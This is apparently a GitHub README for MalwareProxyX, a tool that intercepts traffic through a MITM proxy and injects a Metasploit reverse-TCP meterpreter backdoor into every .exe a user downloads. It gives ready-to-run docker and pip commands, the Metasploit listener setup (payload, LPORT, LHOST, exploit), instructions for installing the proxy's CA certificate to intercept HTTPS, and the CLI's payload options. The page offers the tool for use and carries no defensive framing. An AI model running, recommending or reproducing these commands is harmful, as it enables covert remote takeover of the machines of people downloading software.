Skip to content

Real Time Malware Payload Injection In User Binary Downloads Utilising MITM Proxy

License

Notifications You must be signed in to change notification settings

darshkpatel/MalwareProxyX

Repository files navigation

MalwareProxyX

Screenshots

cli output

usage

Installation & Usage

Docker Container (Recommended)

Requires:

Installation Steps:

There's no 'Installation' per say, just need to pull the latest pre-build docker container from the docker registry.

  • docker pull darshkpatel/malwareproxyx

Usage:

This is the recommended way to use the module.

  1. docker run --rm -v $(pwd)/certs/:/root/.mitmproxy -p 8080:8080 darshkpatel/malwareproxyx --payload_host 192.168.1.25

Note: Please change the --payload_host option to your machine's hostname

  1. Proxy traffic through YOUR_MACHINES_IP:8080(default port for proxy server)

  2. MalwareProxyX Configured! All .exe downloads are backdoored using metasploit reverse tcp meterpreter

  3. Start Metasploit Listener

    • Start metasploit using docker run --rm -it -v "${HOME}/.msf4:/home/msf/.msf4" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
    • Inside metasploit shell:
      • set payload windows/x64/meterpreter/reverse_tcp (remove /x64 for 32-bit payloads)
      • set LPORT 4444 (default port for payload reverse connection in MalwareProxyX: 4444)
      • set LHOST 0.0.0.0
      • exploit -j -i
HTTPS Proxy:

If you need to pass SSL traffic without the SSL certificate errors, you need to install mitmproxy CA Certificate in the OS / Browser manually

These certificates can be found in the .mitmproxy directory in the docker container

If you're using the recommended docker command, the directory is already mounted in a certs folder in your current working directory.

These certificates can copied and installed in the browser / OS of your choice for SSL Support.

PyPi Package (Alternate Method, Not Recommended)

I've also published a PyPi Package for MalwareProxyX for advanced users to use it in other python scripts / modules, this also has a CLI Command to use directly from commandline

Requires:

  • Python >= 3.7
  • mitmproxy >= 6.0
  • msfconsole >= 6.0

Installation:

pip install MalwareProxyX

Please use pip3 if you have multiple versions of pip installed on your system, this package is compatible only with python3

Note: This requires MiTM Proxy & msfvenom to be installed in the system already.

Usage:

malwareproxyx [-h] [-v] [--host HOST] [--port PORT]
               [--payload_port PAYLOAD_PORT] --payload_host PAYLOAD_HOST
               [--payload_win32 PAYLOAD_WIN32] [--payload_win64 PAYLOAD_WIN64]

Real Time Malware Payload Injection In User Binary Downloads Utilising MITM
Proxy

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         displays the current version of MalwareProxyX
                        (default: False)
  --host HOST           Host address server should bind to (default: 0.0.0.0)
  --port PORT           The port server should bind to (default: 8080)
  --payload_port PAYLOAD_PORT
                        The port used for reverse connection from payload
                        (default: 4444)
  --payload_host PAYLOAD_HOST
                        The host used for reverse connection from payload
                        (default: None)
  --payload_win32 PAYLOAD_WIN32
                        metasploit payload for x86 Binaries (default:
                        windows/meterpreter/reverse_tcp)
  --payload_win64 PAYLOAD_WIN64
                        metasploit payload for x64 Binaries (default:
                        windows/x64/meterpreter/reverse_tcp)

About

Real Time Malware Payload Injection In User Binary Downloads Utilising MITM Proxy

Resources

License

Stars

Watchers

Forks

Packages